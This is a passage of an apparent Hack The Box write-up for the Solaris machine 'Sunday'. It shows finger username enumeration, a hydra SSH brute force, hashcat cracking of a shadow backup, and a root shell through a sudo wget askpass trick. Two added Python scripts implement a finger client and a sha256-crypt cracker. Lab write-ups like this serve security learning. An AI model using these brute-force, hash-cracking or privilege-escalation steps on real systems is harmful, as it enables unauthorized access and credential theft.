With no better idea, I tried pentestmonkey's finger-user-enum, using rockyou as the username list.

Command: ./finger-user-enum.pl -U /usr/share/wordlists/rockyou.txt -t 10.10.10.76 -p 79
Result:
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

----------------------------------------------------------
| Scan Information |
----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/rockyou.txt
Target count ............. 1
Username count ........... 14344391
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started #########
789456@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
7777777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
789456123@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
777777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
sammy@10.10.10.76: sammy ??? ssh <Apr 13, 2022> 10.10.14.13 ..
741852963@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
741852@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
753951@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
7654321@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
77777@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
rock you@10.10.10.76: Login Name TTY Idle When Where..rock ???..you ???..
789789@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
778899@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
sunny@10.10.10.76: sunny ??? ssh <Apr 13, 2022> 10.10.14.13 ..
7894561230@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
i love you@10.10.10.76: Login Name TTY Idle When Where..i ???..love ???..you ???..
unknown@10.10.10.76: unknown Unknown Remote UID < . . . . >..
753159@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
789123@10.10.10.76: Login Name TTY Idle When Where..pkg5srv pkg(7) server UID < . . . . >..
te amo@10.10.10.76: Login Name TTY Idle When Wher

Out of all the hits above, only two are real accounts with a login record: sammy and sunny, both last seen over ssh from 10.10.14.13. The rest is noise: the server echoes any word it cannot match followed by "???", and every numeric candidate that starts with 7 appears to match pkg5srv, whose description field reads "pkg(7) server UID".
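To make the finger enumeration above (both the manual `finger admin@sunday.htb` queries and the finger-user-enum run) reproducible without the tools, here is an added example, not part of the original writeup: a minimal finger client that speaks the protocol exactly as described in RFC 1288 (connect to port 79, send the query followed by CRLF, read until EOF) and a parser that separates real accounts from the "???" echo noise using the three row shapes visible in the output above. The `SAMPLE_REPLIES` are constructed from the responses shown on this page so the parser runs offline; the network helper is real but is not exercised by the offline checks.

```python
"""Finger (RFC 1288) client and reply parser for Solaris-style fingerd output.

Added example, not part of the original writeup. SAMPLE_REPLIES are
constructed from the responses shown in the writeup so the parser can be
exercised offline; finger_query() does real network I/O.
"""
import re
import socket

# Solaris fingerd prints this placeholder in the TTY/Idle/When/Where columns
# for an account that exists but has never logged in.
NEVER_LOGGED_IN = re.compile(r"<\s*\.\s+\.\s+\.\s+\.\s*>")


def finger_query(host, query, port=79, timeout=5.0):
    """Send one finger request and return the reply as text.

    The whole protocol is: connect, send "<query>\\r\\n", read until EOF.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(query.encode("ascii", "replace") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("ascii", "replace")


def parse_finger_reply(reply):
    """Classify every row of a finger reply.

    Returns {login: status} with status one of:
      "never_logged_in"   account exists, "< . . . . >" placeholder present
      "has_login_record"  account exists and fingerd printed TTY/When/Where
      "unknown"           fingerd only echoed the query word followed by "???"
    """
    rows = {}
    for line in reply.splitlines():
        line = line.strip()
        if not line or line.startswith("Login") or line.startswith("No one logged on"):
            continue  # column header or the "nobody here" banner
        fields = line.split()
        login = fields[0]
        if NEVER_LOGGED_IN.search(line):
            rows[login] = "never_logged_in"
        elif fields[1:] == ["???"]:
            rows[login] = "unknown"
        else:
            rows[login] = "has_login_record"
    return rows


def real_accounts(replies):
    """Collapse many query->reply pairs into the sorted list of real logins."""
    found = set()
    for reply in replies.values():
        for login, status in parse_finger_reply(reply).items():
            if status != "unknown":
                found.add(login)
    return sorted(found)


# Constructed sample replies, modelled on the output shown in the writeup.
HEADER = "Login       Name               TTY         Idle    When    Where\r\n"
SAMPLE_REPLIES = {
    "admin": HEADER
    + "adm         Admin                                  < .  .  .  . >\r\n"
    + "lp          Line Printer Admin                     < .  .  .  . >\r\n",
    "rock you": HEADER
    + "rock        ???\r\n"
    + "you         ???\r\n",
    "sammy": HEADER
    + "sammy       ???                ssh          <Apr 13, 2022> 10.10.14.13\r\n",
    "sunny": HEADER
    + "sunny       ???                ssh          <Apr 13, 2022> 10.10.14.13\r\n",
    "nobody-here": "No one logged on\r\n",
}

if __name__ == "__main__":
    for query, reply in SAMPLE_REPLIES.items():
        print(f"{query!r} -> {parse_finger_reply(reply)}")
    print("real accounts:", real_accounts(SAMPLE_REPLIES))
    # Against a live host: finger_query("sunday.htb", "sammy")
```

The classifier relies on a Solaris quirk worth knowing: an unknown name is echoed back with "???" in the Name column and nothing else, while a real account either carries the "< . . . . >" never-logged-in placeholder or a TTY/When/Where record, which is why sammy and sunny (whose Name column is also "???") still count as real.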

I put sammy and sunny into username.txt and ran hydra again with rockyou as the password list, this time against SSH on port 22022, on the chance that one of them uses a weak password on Solaris as well.

Result:
[DATA] attacking ssh://10.10.10.76:22022/
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday

The password is surprisingly simple.

Command: ssh sunny@10.10.10.76 -p 22022
User flag in sammy

Lateral Movement (?)

user.txt is in sammy's home directory, so I probably need to move to sammy before going for root. First, I look for setuid-root binaries that sunny can execute.

Command: find / -perm -u=s -type f 2>/dev/null
Result:
/usr/lib/ssh/ssh-keysign
/usr/lib/inet/mailq
/usr/lib/acct/accton
/usr/lib/fs/ufs/ufsrestore
/usr/lib/fs/ufs/ufsdump
/usr/lib/fs/smbfs/umount
/usr/lib/fs/smbfs/mount
/usr/lib/vmware-tools/bin/i86/vmware-user-suid-wrapper
/usr/lib/utmp_update
/usr/bin/uptime
/usr/bin/atrm
/usr/bin/passwd
/usr/bin/rcp
/usr/bin/chkey
/usr/bin/rmformat
/usr/bin/pfedit
/usr/bin/atq
/usr/bin/w
/usr/bin/cdrw
/usr/bin/crontab
/usr/bin/sys-suspend
/usr/bin/rlogin
/usr/bin/newgrp
/usr/bin/at
/usr/bin/su
/usr/bin/newtask
/usr/bin/sudo
/usr/bin/rsh
/usr/xpg4/bin/crontab
/usr/xpg4/bin/at
/usr/xpg6/bin/crontab
/usr/sbin/quota
/usr/sbin/fmdump
/usr/sbin/ping
/usr/sbin/traceroute
/usr/sbin/smbadm
/usr/sbin/whodo

Next, checking what sunny is allowed to run through sudo.

Command: sudo -l
Result:
User sunny may run the following commands on sunday:
(root) NOPASSWD: /root/troll

Command: sudo /root/troll
Result:
testing
uid=0(root) gid=0(root)

Command: uname -a
Result:
SunOS sunday 5.11 11.4.0.15.0 i86pc i386 i86pc

I transferred pspy32 to the box, but the process was killed as soon as I ran it: pspy is a Linux binary and Solaris cannot execute it. linpeas ran but threw "illegal option" errors from grep, because the script assumes GNU grep flags that Solaris /usr/bin/grep does not support.

After more enumeration, I found a /backup directory on the machine containing a backup copy of the shadow file that sunny can read.

Shadow backup

I tried to crack it with hashcat. The $5$ prefix identifies sha256-crypt hashes (hashcat mode 7400).

Hashcat mode for $5$
Command: hashcat -m 7400 creds.txt /usr/share/wordlists/rockyou.txt

To print cracked results from the potfile, rerun with --show:
Command: hashcat -m 7400 creds.txt /usr/share/wordlists/rockyou.txt --show
Result:
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
Successful to login
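To double-check the crack without hashcat, here is an added example (not part of the original writeup and not hashcat's code): a pure-Python sha256-crypt implementation following Ulrich Drepper's "Unix crypt using SHA-256 and SHA-512" specification, which is the algorithm behind $5$ hashes on both Solaris and glibc. It parses the shadow entry shown above, recomputes the hash for a candidate, and runs a tiny constructed wordlist through it in place of rockyou.txt. The assumption is that the hash line above is transcribed exactly as it appears in the backup; the `WORDLIST` is constructed for the example.

```python
"""Pure-Python sha256-crypt ($5$) to re-verify a cracked shadow entry.

Added example, not from the original writeup or from hashcat. Implements the
algorithm from Drepper's "Unix crypt using SHA-256 and SHA-512" spec, which
Solaris and glibc both use for $5$ entries.
"""
import hashlib

B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DEFAULT_ROUNDS = 5000

# Output byte order of the custom base64 step: (b2, b1, b0, chars) per group.
_ORDER = [(0, 10, 20, 4), (21, 1, 11, 4), (12, 22, 2, 4), (3, 13, 23, 4),
          (24, 4, 14, 4), (15, 25, 5, 4), (6, 16, 26, 4), (27, 7, 17, 4),
          (18, 28, 8, 4), (9, 19, 29, 4), (None, 31, 30, 3)]


def _repeat_to(block, length):
    """Tile a 32-byte digest out to exactly `length` bytes."""
    return (block * (length // 32 + 1))[:length]


def _b64_digest(c):
    out = []
    for b2, b1, b0, n in _ORDER:
        w = ((0 if b2 is None else c[b2]) << 16) | (c[b1] << 8) | c[b0]
        for _ in range(n):
            out.append(B64[w & 0x3F])
            w >>= 6
    return "".join(out)


def sha256_crypt(password, salt, rounds=DEFAULT_ROUNDS):
    """Return the 43-character hash body for password (bytes) and salt (bytes)."""
    salt = salt[:16]  # spec: at most 16 salt bytes are used
    plen, slen = len(password), len(salt)

    # Digest B = H(pw || salt || pw)
    b = hashlib.sha256(password + salt + password).digest()

    # Digest A = H(pw || salt || B tiled to len(pw) || per-bit-of-len(pw) mix)
    a = hashlib.sha256(password + salt)
    a.update(_repeat_to(b, plen))
    n = plen
    while n > 0:
        a.update(b if n & 1 else password)
        n >>= 1
    a = a.digest()

    # P = H(pw repeated len(pw) times) tiled to len(pw)
    p = _repeat_to(hashlib.sha256(password * plen).digest(), plen)
    # S = H(salt repeated 16 + A[0] times) tiled to len(salt)
    s = _repeat_to(hashlib.sha256(salt * (16 + a[0])).digest(), slen)

    # Key stretching: the input order of each round depends on the round number
    c = a
    for r in range(rounds):
        h = hashlib.sha256()
        h.update(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    return _b64_digest(c)


def parse_shadow_hash(entry):
    """Split '$5$[rounds=N$]salt$hash' into (rounds, salt, hash)."""
    parts = entry.split("$")
    if len(parts) < 4 or parts[0] != "" or parts[1] != "5":
        raise ValueError("not a sha256-crypt ($5$) entry")
    rounds, idx = DEFAULT_ROUNDS, 2
    if parts[idx].startswith("rounds="):
        rounds = int(parts[idx][len("rounds="):])
        idx += 1
    return rounds, parts[idx], parts[idx + 1]


def verify(entry, candidate):
    """True if `candidate` (str) hashes to the shadow `entry`."""
    rounds, salt, expected = parse_shadow_hash(entry)
    return sha256_crypt(candidate.encode(), salt.encode(), rounds) == expected


def crack(entry, wordlist):
    """Return the first word in `wordlist` matching `entry`, else None."""
    for word in wordlist:
        if verify(entry, word):
            return word
    return None


# The entry cracked by hashcat above (sammy's line from the shadow backup).
CRACKED_ENTRY = "$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB"
# Constructed mini wordlist standing in for rockyou.txt.
WORDLIST = ["password", "sunday", "cooldude", "cooldude!"]

if __name__ == "__main__":
    print("cracked:", crack(CRACKED_ENTRY, WORDLIST))
```

Each candidate costs 5000 SHA-256 invocations by design, which is why hashcat on a GPU is the right tool for rockyou-sized lists; this script exists to show what the $5$ format actually encodes and to confirm a result, not to replace the cracker.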

Privilege Escalation

As sammy, I start with the same basic enumeration.

Command: sudo -l
Result:
User sammy may run the following commands on sunday:
(ALL) ALL
(root) NOPASSWD: /usr/bin/wget

Note that the first rule, (ALL) ALL, already lets sammy run anything as root with sammy's own password, which we now know. The second rule needs no password at all, and GTFOBins lists a sudo privilege escalation for wget.

Commands:
TF=$(mktemp) => create an empty temporary file and store its path in TF
chmod +x $TF => make it executable
echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF => write a two-line script into it: a shell whose stdout is redirected to file descriptor 0 (the terminal). wget reads the askpass program's stdout through a pipe, so without this redirection the shell's output would be swallowed by wget instead of reaching us
sudo wget --use-askpass=$TF 0 => wget, now running as root via sudo, executes the askpass program to obtain a password for the URL "0"; the program is our script, so we get a root shell. On shells whose echo does not honour -e, use printf to write the script instead
Privesc

Summary

There are several vulnerabilities here:

  • Weak credentials (sunny's password is guessable and sammy's hash cracks quickly against rockyou).
  • Unnecessary exposed services (finger, printer, etc.); finger in particular leaks valid usernames.
  • Weak file permissions (a backup copy of the shadow file readable by an unprivileged user).
  • Over-permissive sudo rules (wget as root without a password).

Remediation I would suggest:

  • Use stronger credentials.
  • Close unnecessary ports and disable services that are not needed.
  • Apply the principle of least privilege, especially to file permissions and sudo rules.

What didn't work for me:

  • Using CVE to privesc.
  • Injection in login site.
  • Searching and using exploit from searchsploit, exploitdb, etc based on version.
  • Directory busting.
  • Pspy and linpeas.

What I can improve:

  • Exploring other services/ports.
  • There might be several ways to privesc.

What I learnt from this box:

  • Brute force can work because many people use common credentials (even though the usual advice is that if you are brute forcing, you are probably missing information).
  • Finger enumeration with finger-user-enum.pl reveals which usernames exist and which have logged on.

This machine may well have other vulnerabilities and other ways to privesc. Please let me know if you have any recommendations, criticism, or something I might have missed on this box. That's all folks. Thanks for reading.

https://www.hackthebox.com/achievement/machine/420156/136


Geranard

Just a boy who interested in cyber security with little knowledge about it. "A nudge would be great!" - me, everytime.